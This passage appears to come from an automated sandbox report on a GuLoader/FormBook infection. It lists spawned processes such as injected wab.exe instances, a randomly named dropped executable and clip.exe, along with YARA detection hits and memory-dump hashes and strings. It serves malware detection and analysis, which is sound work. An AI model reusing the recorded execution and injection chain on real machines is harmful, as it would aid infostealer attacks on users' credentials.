                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.1660374596.0000000009B07000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.1653655863.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:15
                                                Start time:13:57:48
                                                Start date:01/06/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
                                                Imagebase:0x410000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:17
                                                Start time:15:29:08
                                                Start date:01/06/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x210000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:18
                                                Start time:15:29:09
                                                Start date:01/06/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x210000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000002.1843095733.00000000036C7000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:21
                                                Start time:15:29:30
                                                Start date:01/06/2024
                                                Path:C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe"
                                                Imagebase:0x200000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:false

                                                Target ID:22
                                                Start time:15:29:32
                                                Start date:01/06/2024
                                                Path:C:\Windows\SysWOW64\clip.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\clip.exe"
                                                Imagebase:0x190000
                                                File size:24'576 bytes
                                                MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:25
                                                Start time:15:29:45
                                                Start date:01/06/2024
                                                Path:C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe"
                                                Imagebase:0x200000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:false

                                                Target ID:26
                                                Start time:15:29:52
                                                Start date:01/06/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x210000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:27
                                                Start time:15:29:53
                                                Start date:01/06/2024
                                                Path:C:\Windows\System32\rundll32.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                Imagebase:0x7ff7541c0000
                                                File size:71'680 bytes
                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:29
                                                Start time:15:29:58
                                                Start date:01/06/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff722870000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:30
                                                Start time:15:30:00
                                                Start date:01/06/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x210000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1917776699.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e425906d0156f2dcee79c97e039953e10e4884e86daae29192a6507b26a9fbc5
                                                  • Instruction ID: 744a43f38cf7dc83541d3c8e2bb05930a72a8ee658c6d5542cec24ab0b6c8adb
                                                  • Opcode Fuzzy Hash: e425906d0156f2dcee79c97e039953e10e4884e86daae29192a6507b26a9fbc5
                                                  • Instruction Fuzzy Hash: A9F1C570908A4E8FEBA9DF28D845BE937D1FF55310F04826EE84DC7291DB38D9558B82
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1917776699.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee0223f75ab977c1a63da33542bd2dab1ae2bb270fbe697f1ec5f12d4ab23e8a
                                                  • Instruction ID: 9c2f8823ef3a14ccd4adfa5981f820055bd09cb035b161c9d718e442c99fd314
                                                  • Opcode Fuzzy Hash: ee0223f75ab977c1a63da33542bd2dab1ae2bb270fbe697f1ec5f12d4ab23e8a
                                                  • Instruction Fuzzy Hash: 10E1C130908A4E8FFBA9DF28C855BE977E1FB55310F04826AE84DC7292CE78D8548781
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1918875732.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaacda0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -
                                                  • API String ID: 0-2547889144
                                                  • Opcode ID: 310d15767f40afdf0bdc3257860b2adfe34f0c8a7b25a1e6085d1aaefe2fefb9
                                                  • Instruction ID: bf663a07f43ce404c9d69d5811fe716a52327a0f8abb810fda1191053d4854c3
                                                  • Opcode Fuzzy Hash: 310d15767f40afdf0bdc3257860b2adfe34f0c8a7b25a1e6085d1aaefe2fefb9
                                                  • Instruction Fuzzy Hash: 25122762A0EBC68FF7969B2888655B57FE0EF57620B1841FBD09DC71D3DE18D8098381
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1918875732.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaacda0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ad0db55bbb2a1d3b5c9d7ccd0ade8bcdfab283e39414e8ac378f6ee3111a695
                                                  • Instruction ID: ad7333f45e0c9a8e41f5dace8f4b32768b3bee19ef6789dcd4d54ad399974713
                                                  • Opcode Fuzzy Hash: 8ad0db55bbb2a1d3b5c9d7ccd0ade8bcdfab283e39414e8ac378f6ee3111a695
                                                  • Instruction Fuzzy Hash: 94B12AA2A0EF898FFB559B2848545B97BE1EF56620B4805FFD05DC71D3EE18DC088381
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1917776699.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba3e296f9e4fc9d3af6739ea4d829e10b7570a386eaefa58d89823000cec81f8
                                                  • Instruction ID: c6efffb084c3c46dbe104e0c5247f79e37b278c99efb0831acab3348fb31638d
                                                  • Opcode Fuzzy Hash: ba3e296f9e4fc9d3af6739ea4d829e10b7570a386eaefa58d89823000cec81f8
                                                  • Instruction Fuzzy Hash: FC81287061CA498FE789EF1CC495BB5B7E1EF99311B1045BED08EC32A6DA25F846C780
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1918875732.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaacda0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7bf8108a925ed829926d0fc80c66b1ddfc7f5fbbfe977198b512a270a28c539b
                                                  • Instruction ID: 58bb952250b91fe5b1fd7f697c68197d9fc060f6907ba8ea17ecc0d4e34136f9
                                                  • Opcode Fuzzy Hash: 7bf8108a925ed829926d0fc80c66b1ddfc7f5fbbfe977198b512a270a28c539b
                                                  • Instruction Fuzzy Hash: 395136A2B1FA868FF795D72888515B9BED1EF86720B5851BAD06DC31D3DE18DC088381
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1918875732.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaacda0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9edcec21ba24a8e287700c21f70cd2a276771c83aa13d39f36b2e63fc3fe4e6b
                                                  • Instruction ID: ba53e56f6112c7a065e6433b45dbf63593b17438b26517fa4d66886c0d976687
                                                  • Opcode Fuzzy Hash: 9edcec21ba24a8e287700c21f70cd2a276771c83aa13d39f36b2e63fc3fe4e6b
                                                  • Instruction Fuzzy Hash: B831F892F1FE8A8FFA65976858151787AD1AF46A20B5809BAD06DC30D3FE4CA80842C1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1917776699.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                  • Instruction ID: 2e2ae42c124f45b8248b17c802c13fba615db4093582208906ef6c5616fc3453
                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                  • Instruction Fuzzy Hash: B501447111CB088FD744EF0CE455AA5B7E0FB99364F10056EE58AC3661D626E892CB45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1917776699.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8,8$P/8$p08$-8$/8
                                                  • API String ID: 0-3573041664
                                                  • Opcode ID: 8836a8fa079be3b6cbe0574690ac3687743f6620024b963507a28e9cf72a9422
                                                  • Instruction ID: 1027eed3cd107ff1157b8712ba523d784f0c661191789dd2c294384a14e33224
                                                  • Opcode Fuzzy Hash: 8836a8fa079be3b6cbe0574690ac3687743f6620024b963507a28e9cf72a9422
                                                  • Instruction Fuzzy Hash: A7317C8680F7C19FF3178BA818252796FA0AF4360171980FBE08C8F9DB94499D4DC3D6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \V3k
                                                  • API String ID: 0-3869630692
                                                  • Opcode ID: e794f53ec41d6ea62d4709f617df73d9defe8674fc44a5787c7155798f0582b4
                                                  • Instruction ID: 6185347eb1df6d4e2fb410b27fbb852e50a62a3ae8e1b15386f4afa6fc1b9225
                                                  • Opcode Fuzzy Hash: e794f53ec41d6ea62d4709f617df73d9defe8674fc44a5787c7155798f0582b4
                                                  • Instruction Fuzzy Hash: 68B15E70E00219DFDB24CFA9C8857AEBBF2BF88705F148529E815A7395EB74A845CF41
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 494c334f071c4fd50ab23074c5ef79cee2b254d935c4d8a51a990538b7969499
                                                  • Instruction ID: 6e0fc5c1bc9a2ae230f3697e8e1dbc952bdf138ef1d98bbb3010bc3de10734f5
                                                  • Opcode Fuzzy Hash: 494c334f071c4fd50ab23074c5ef79cee2b254d935c4d8a51a990538b7969499
                                                  • Instruction Fuzzy Hash: ADB17D70E00309CFDB24CFA9D98179DBBF2AF88355F148529E815EB395EB74A841CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-4027085306
                                                  • Opcode ID: f8c1d800e4d55f4855f144a3fecc47d820f7a216e6eb58fca0cee56463b80e4c
                                                  • Instruction ID: 43633dfbb98097b215b9d145874c0a25ea5db229733eb3a6e0a30b1c5e3eb9ae
                                                  • Opcode Fuzzy Hash: f8c1d800e4d55f4855f144a3fecc47d820f7a216e6eb58fca0cee56463b80e4c
                                                  • Instruction Fuzzy Hash: 367204B5B00306AFDB249B68D5426EEBBF2BF89210F14847BD8059B755CB31DC46CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                                  • API String ID: 0-663938088
                                                  • Opcode ID: 764a4a1cf0d0788000108a760dfbc98709a2ea8a267f527346b8ebd55dd29b58
                                                  • Instruction ID: 82e43ed3cf005f5c1403f067083b00dcb5859a1d0a7f02c99efd17ea690e5c5d
                                                  • Opcode Fuzzy Hash: 764a4a1cf0d0788000108a760dfbc98709a2ea8a267f527346b8ebd55dd29b58
                                                  • Instruction Fuzzy Hash: 046262B4A002199FDB64DF54C950BDDBBB2BF85344F1084E9DA096B781CB31AE82CF95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq
                                                  • API String ID: 0-3075684691
                                                  • Opcode ID: d25c66c1aa146bedc2c94b3d4e634809caff4054130b99816073a3686a0f20b8
                                                  • Instruction ID: 6f523328d5309cda6cabac7fee30962b6bb414a7590481fbd7bce26108bc30db
                                                  • Opcode Fuzzy Hash: d25c66c1aa146bedc2c94b3d4e634809caff4054130b99816073a3686a0f20b8
                                                  • Instruction Fuzzy Hash: 3F9290B4A00315EFDB24CB54C950BAEBBB2FF85310F1489AAD9099B745DB31EC46CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8N3k$Hq$h]3k$h]3k$h]3k$$q$$q$I3k
                                                  • API String ID: 0-2631099303
                                                  • Opcode ID: 095ce15126ff553a6f1d1315f69f11f8181f62b24f1e70d627aac762110bf4a1
                                                  • Instruction ID: 9da4fa14b189da1df702c4f6fceb3bdc00277096637edad20d644964c82076ba
                                                  • Opcode Fuzzy Hash: 095ce15126ff553a6f1d1315f69f11f8181f62b24f1e70d627aac762110bf4a1
                                                  • Instruction Fuzzy Hash: 1F224034B002188FDB25DB64C8557AEB7F2BF89305F1444A9D84AAB362DF35AD85CF81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                                  • API String ID: 0-1794337482
                                                  • Opcode ID: baa5c1b5903f577ab8708e6845d7a5c284f683586416b9f8033e532aba4c2dc3
                                                  • Instruction ID: d454316d5b4c08d65b808d08bf04282ae2dbb95394a24eb0007d5c9619d28786
                                                  • Opcode Fuzzy Hash: baa5c1b5903f577ab8708e6845d7a5c284f683586416b9f8033e532aba4c2dc3
                                                  • Instruction Fuzzy Hash: 62D1AEB4E10205AFEB28DB64C550BDEBBA2BBC8340F10C869D9156F395CB75EC428B95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$$q$$q$$q$$q
                                                  • API String ID: 0-1538229613
                                                  • Opcode ID: e71735a2234dda6df32389684208bdc501a1151682746b7e7d33001c8de9dcf0
                                                  • Instruction ID: 00b11b3fdd83d492272d43e9215a7b3b63ae3317dfc16d76bc07f0f5ee8d369f
                                                  • Opcode Fuzzy Hash: e71735a2234dda6df32389684208bdc501a1151682746b7e7d33001c8de9dcf0
                                                  • Instruction Fuzzy Hash: 11B129B1B24206AFEB248B65D4417EEBBA1FFC5250F14847BD90D8B2D1EA31D845C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$$q$$q$$q
                                                  • API String ID: 0-170447905
                                                  • Opcode ID: 93bd6f6fc3898d8ef2de3fbc130bbc57633a5178202e3479da5a0c377ab586ed
                                                  • Instruction ID: 28b819432c2e9405d444dcc423583d2dfa47fac4e40bbd63703603f5a810439f
                                                  • Opcode Fuzzy Hash: 93bd6f6fc3898d8ef2de3fbc130bbc57633a5178202e3479da5a0c377ab586ed
                                                  • Instruction Fuzzy Hash: 795127B1704206BFCB658B65D8126EEBBF1BFC6211F1984BBD8058B252C631C842C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q
                                                  • API String ID: 0-3126650252
                                                  • Opcode ID: 703861ac6161ce1615de68958e6bdab5f27d5101331371a877a05bf85647415d
                                                  • Instruction ID: 7b266311173ad5375b77307ab9253bf729d25573bd83ed218fadd8978a90486c
                                                  • Opcode Fuzzy Hash: 703861ac6161ce1615de68958e6bdab5f27d5101331371a877a05bf85647415d
                                                  • Instruction Fuzzy Hash: A1B19CB4A00205AFDB24CF54C590BDEBBB2BB88344F15C86AD9056F395CB35EC46CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tPq$tPq
                                                  • API String ID: 0-4270251778
                                                  • Opcode ID: 5a87013b750f780e84edfd708b8a9f41131563549a3411654be3463beda28e80
                                                  • Instruction ID: b319dcd93924812c2f98703af2ca2ef243c4df44e1d8cdf70a065ee9de7a5311
                                                  • Opcode Fuzzy Hash: 5a87013b750f780e84edfd708b8a9f41131563549a3411654be3463beda28e80
                                                  • Instruction Fuzzy Hash: 6102D5B4B00245AFDB249BA8C550BAEBBE2BF85340F14C46AD9155F791CB71EC42CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q
                                                  • API String ID: 0-1467158625
                                                  • Opcode ID: 0ad23be99c7efa5cda1ec96a6e8f62d690367a442bda00a8fcbfe903c82c954a
                                                  • Instruction ID: f598581197f556f11d6f70f3f611beeeba53189668a652b27685215abdbbdc80
                                                  • Opcode Fuzzy Hash: 0ad23be99c7efa5cda1ec96a6e8f62d690367a442bda00a8fcbfe903c82c954a
                                                  • Instruction Fuzzy Hash: AF025FB4A00219DFEB24DB54C950BDDB7B2BB84300F10C5E5DA19AB781CB71AE82CF95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q
                                                  • API String ID: 0-1467158625
                                                  • Opcode ID: cbea9eba85b67161cb7a9e5185686df074a359383aa378914cbfe118c6c9cd44
                                                  • Instruction ID: 5ba7d8c018f4305f679e239b503798d9946364bc3efc47898391802480103da8
                                                  • Opcode Fuzzy Hash: cbea9eba85b67161cb7a9e5185686df074a359383aa378914cbfe118c6c9cd44
                                                  • Instruction Fuzzy Hash: A2F19DB0A00215DFEB24DB14C950B9EBBB2FB88344F54C4A9D9096B795CB71ED82CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q
                                                  • API String ID: 0-1467158625
                                                  • Opcode ID: 9c013ebc4511c499a150a84e4a304cd4bfdef48cf2b7505690ff2faa52595f65
                                                  • Instruction ID: 06e50a4732564f35fe7a956e8734d0e3445012643e1ce39b1423decf075e5a7b
                                                  • Opcode Fuzzy Hash: 9c013ebc4511c499a150a84e4a304cd4bfdef48cf2b7505690ff2faa52595f65
                                                  • Instruction Fuzzy Hash: 51E186B4A00218AFE724DF64CD54B9E7BB2BB84340F1084A9DA099F791CB75ED428F95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q
                                                  • API String ID: 0-3126353813
                                                  • Opcode ID: 36061b60ebb369c5194c1034bf43acc254f1d8bc7267032a65f9f51780ae2e55
                                                  • Instruction ID: 1c995499843f55239cd1caeffe5835a083c0622bd8be36224cde746d2b5cdc7b
